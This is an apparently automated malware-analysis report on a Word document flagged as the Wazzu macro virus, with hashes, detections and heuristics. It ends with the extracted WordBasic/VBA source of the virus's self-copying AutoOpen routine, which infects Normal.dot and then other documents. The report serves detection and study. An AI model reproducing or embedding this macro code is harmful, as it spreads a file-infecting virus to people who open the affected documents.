Wazzu — Office (OLE) malware analysis

Static analysis result for SHA-256 9815991005b59d91…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 2000-06-02 20:33:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b421cd7df5fb0f9d6d1aac5e399ec29b
SHA-1: ebb70764d748a998a545ebb00a9397733bc55512
SHA-256: 9815991005b59d918d25c7c3b81a02fa0a7894090f7fb4c5faeaa6497f1673d5
Risk Score: 188

Malware Insights

Wazzu · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro code, specifically an AutoOpen macro that is designed to copy itself to the Normal.dot template. This technique is indicative of malware aiming for persistence on the victim machine. The presence of legacy WordBasic macro markers and ClamAV detections for 'Doc.Trojan.Wazzu' strongly suggests the Wazzu family.

Heuristics (4)

  • ClamAV: Doc.Trojan.Wazzu-47 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-47
  • Legacy WordBasic macro-virus markers [high] [OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium] [OLE_VBA_MACROS] (1 related finding)
    Document contains VBA macro code
  • AutoOpen macro [low] [OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script: Attribute VB_Name = "autoOpen"

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1166 bytes

SHA-256: 2e3906669d0a423e42aaee6d12e2804bba8646509b9b3c56ea9e17cd78eaeb22
Detection: ClamAV: Doc.Trojan.Wazzu-14
Obfuscation or payload: unlikely

Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "autoOpen"

Public Sub MAIN()
Dim TheSmallOne$
Dim TheBigOne$
Dim ThisOne$
   
    TheSmallOne$ = WordBasic.[FileName$]() + ":autoOpen"

    TheBigOne$ = "Global:autoOpen"
    ThisOne$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))

    If ThisOne$ = "NORMAL.DOT" Then
        SmallFileAtt = GetAttr(WordBasic.[FileName$]())
        If SmallFileAtt >= 32 Then SmallFileAtt = SmallFileAtt - 32
        If SmallFileAtt >= 4 Then SmallFileAtt = SmallFileAtt - 4
        If SmallFileAtt >= 2 Then SmallFileAtt = SmallFileAtt - 2
        If SmallFileAtt = 0 Then
        
            WordBasic.MacroCopy TheBigOne$, TheSmallOne$
            WordBasic.FileSaveAs Format:=1
            WordBasic.SetDocumentDirty 0
        End If
    Else
        WordBasic.MacroCopy TheSmallOne$, TheBigOne$
    End If
    
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True